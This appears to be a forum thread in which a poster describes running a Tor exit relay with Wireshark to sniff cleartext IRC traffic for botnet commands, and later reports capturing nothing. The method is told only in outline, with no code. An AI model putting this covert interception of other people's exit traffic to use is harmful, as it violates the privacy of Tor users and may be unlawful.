So, a lot of us know (or should know) some of the issues with using Tor.
The nodes that are used to leave the network has to decrypt the traffic, so that the data can be sent in its original state to whatever machine is receiving it.
And since anyone can be a part of the Tor network, this opens up for opportunities.
Say you have a list of different commands used for different kinds of botnets (mainly public script kiddie ones), and then say you happen to have a server that is a part of the Tor network, and is an end-node for a lot of traffic, meaning that the traffic leaves the machine, unencrypted.
In the case of clear text IRC botnets, one could make a simple script, or even a filter in Wireshark, to grab packets that contain certain clear text commands. Thus secretly sniffing out botnets.
Now, the question if this is ethical or not can be tricky, since it's basically exploiting the Tor service, but on the other hand, it's a way to catch bad guys.
The problem about this is that you have to be pretty clean yourself, since this means someone can abuse Tor through and do "not so nice stuff", like downloading illegal material, break into servers and download child porn, etc. So the risk exists that you get some sort of complain from your ISP if they don't notice that you are running a Tor relay.
Personally, I'm thinking about trying this and limiting the traffic pretty hard, so that people can't use the relay for much daily use. It will lower the chances of catching what I want, but at least it's safer. After all, I'm not that clean, and better safe than sorry.
Sneaky idea to find a botnet using Tor
Sneaky idea to find a botnet using Tor
"The best place to hide a tree, is in a forest"
Ok, so I setup a Tor relay on a virtual machine running Debian, along with Wireshark to monitor the traffic. At the moment I'm not getting much exit node traffic, so at this very moment my "awesome botnet filter" wont be needed, since if I even get one packet, I can check that one manually.
I will let this be for a little while, and see how it plays out.
PS: I disabled all traffic but the IRC traffic, less results, but at least I get less abuse as well from the CP freaks over at 4chan.
I added a notice on the webserver running on my network along with a mail where people could send the abuse if anything were to happen.
Now all I can do is wait ...
I will let this be for a little while, and see how it plays out.
PS: I disabled all traffic but the IRC traffic, less results, but at least I get less abuse as well from the CP freaks over at 4chan.
I added a notice on the webserver running on my network along with a mail where people could send the abuse if anything were to happen.
Now all I can do is wait ...
"The best place to hide a tree, is in a forest"
-
hpprinter100
- Fame ! Where are the chicks?!
- Posts: 214
- Joined: 19 Oct 2007, 16:00
- 16
- Contact:
Update on this project.
So far I haven't captured anything interesting.
I'm thinking about setting up a permanent relay so that I can sniff traffic during a longer period of time, but I haven't decided on anything yet.
Anyway, bottom line is that this idea works in theory, you just have to be lucky enough to get someone to use your relay as an exit node and someone that is stupid enough to send commands to a botnet using it.
So far I haven't captured anything interesting.
I'm thinking about setting up a permanent relay so that I can sniff traffic during a longer period of time, but I haven't decided on anything yet.
Anyway, bottom line is that this idea works in theory, you just have to be lucky enough to get someone to use your relay as an exit node and someone that is stupid enough to send commands to a botnet using it.
"The best place to hide a tree, is in a forest"